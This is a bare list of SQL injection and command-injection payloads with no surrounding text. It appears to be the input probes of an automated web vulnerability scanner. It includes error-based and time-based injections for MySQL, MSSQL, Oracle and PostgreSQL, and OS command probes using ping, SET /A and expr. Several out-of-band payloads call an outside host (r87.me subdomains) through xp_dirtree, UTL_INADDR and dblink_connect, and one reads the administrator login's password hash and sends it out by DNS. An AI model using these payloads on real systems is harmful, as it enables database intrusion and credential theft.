‘AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or ‘1’=’
ping -n 25 127.0.0.1 &
NS3333333NO
SET /A 0xFFF9999-8629 &
-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
-1′ and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+’
-1″ and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+”
declare @h varchar(999)select @h=’1’+substring(name+’-‘+master.sys.fn_varbintohexstr(ISNULL(password_hash,0x0)),0,63)+’.6wv1uj2sgm7qosa7uqbrofe2pdjslmwc9bpwfbes’+’hvo.r87.me’ from sys.sql_logins WHERE principal_id=1;exec(‘xp_dirtree ”\\’+@h+’\c$”’)
(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
-1’+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+’
-1\’+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))– 1
syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x– /* d5e1feb4-c166-4a05-af9d-1c6593976511 */
expr 268409241 – 25517;
(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))
expr 268409241 – 84442
3333333 + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*’XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR’|”XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR”*/ /* 903243fd-81dc-43fb-909f-7bc2888ce3d6 */
‘||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||’
-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))– 1 /* 19800bc9-3c51-4208-97d1-ebd9c3c649c7 */
syscolumns WHERE 2>3;exec(‘xp_dirtree ”\\6wv1uj2sgmolm7ab8wqhp5tyrrblznjuye36sds9’+’fyq.r87.me’+’\c$\a”’)–
-1\’+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand(0)*2))x from INFORMATION_SCHEMA.COLLATIONS group by x limit 1))– 1
cast((SELECT dblink_connect(chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(54)||chr(119)||chr(118)||chr(49)||chr(117)||chr(106)||chr(50)||chr(115)||chr(103)||chr(109)||chr(48)||chr(105)||chr(108)||chr(55)||chr(100)||chr(56)||chr(99)||chr(106)||chr(56)||chr(99)||chr(52)||chr(97)||chr(103)||chr(108)||chr(98)||chr(103)||chr(99)||chr(100)||chr(54)||chr(106)||chr(52)||chr(97)||chr(121)||chr(112)||chr(115)||chr(118)||chr(99)||chr(109)||chr(117)||chr(115)||chr(102)||chr(112)||chr(52)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)||chr(32)||chr(117)||chr(115)||chr(101)||chr(114)||chr(61)||chr(97)||chr(32)||chr(112)||chr(97)||chr(115)||chr(115)||chr(119)||chr(111)||chr(114)||chr(100)||chr(61)||chr(97)||chr(32)||chr(99)||chr(111)||chr(110)||chr(110)||chr(101)||chr(99)||chr(116)||chr(95)||chr(116)||chr(105)||chr(109)||chr(101)||chr(111)||chr(117)||chr(116)||chr(61)||chr(50))) as numeric)
‘||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(‘6wv1uj2sgmx_puttt9o7nt_4y7ozm7jahs4rxd1g’||’urw.r87.me’) from DUAL))||’
(select UTL_INADDR.GET_HOST_ADDRESS(chr(54)||chr(119)||chr(118)||chr(49)||chr(117)||chr(106)||chr(50)||chr(115)||chr(103)||chr(109)||chr(115)||chr(54)||chr(122)||chr(106)||chr(100)||chr(57)||chr(57)||chr(119)||chr(117)||chr(105)||chr(49)||chr(119)||chr(118)||chr(121)||chr(121)||chr(108)||chr(122)||chr(56)||chr(119)||chr(121)||chr(100)||chr(51)||chr(111)||chr(50)||chr(53)||chr(121)||chr(121)||chr(105)||chr(104)||chr(118)||chr(101)||chr(115)||chr(117)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL)
(length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(54)||chr(119)||chr(118)||chr(49)||chr(117)||chr(106)||chr(50)||chr(115)||chr(103)||chr(109)||chr(56)||chr(55)||chr(99)||chr(95)||chr(121)||chr(116)||chr(114)||chr(114)||chr(50)||chr(103)||chr(111)||chr(116)||chr(112)||chr(107)||chr(100)||chr(119)||chr(99)||chr(109)||chr(53)||chr(121)||chr(115)||chr(104)||chr(107)||chr(103)||chr(108)||chr(121)||chr(114)||chr(95)||chr(107)||chr(116)||chr(98)||chr(99)||chr(119)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL))))
‘||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(54)||chr(119)||chr(118)||chr(49)||chr(117)||chr(106)||chr(50)||chr(115)||chr(103)||chr(109)||chr(107)||chr(52)||chr(107)||chr(112)||chr(113)||chr(113)||chr(120)||chr(106)||chr(97)||chr(106)||chr(111)||chr(98)||chr(109)||chr(101)||chr(111)||chr(122)||chr(51)||chr(45)||chr(114)||chr(48)||chr(107)||chr(110)||chr(56)||chr(99)||chr(118)||chr(100)||chr(50)||chr(104)||chr(117)||chr(48)||chr(113)||chr(107)||chr(119)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL))||’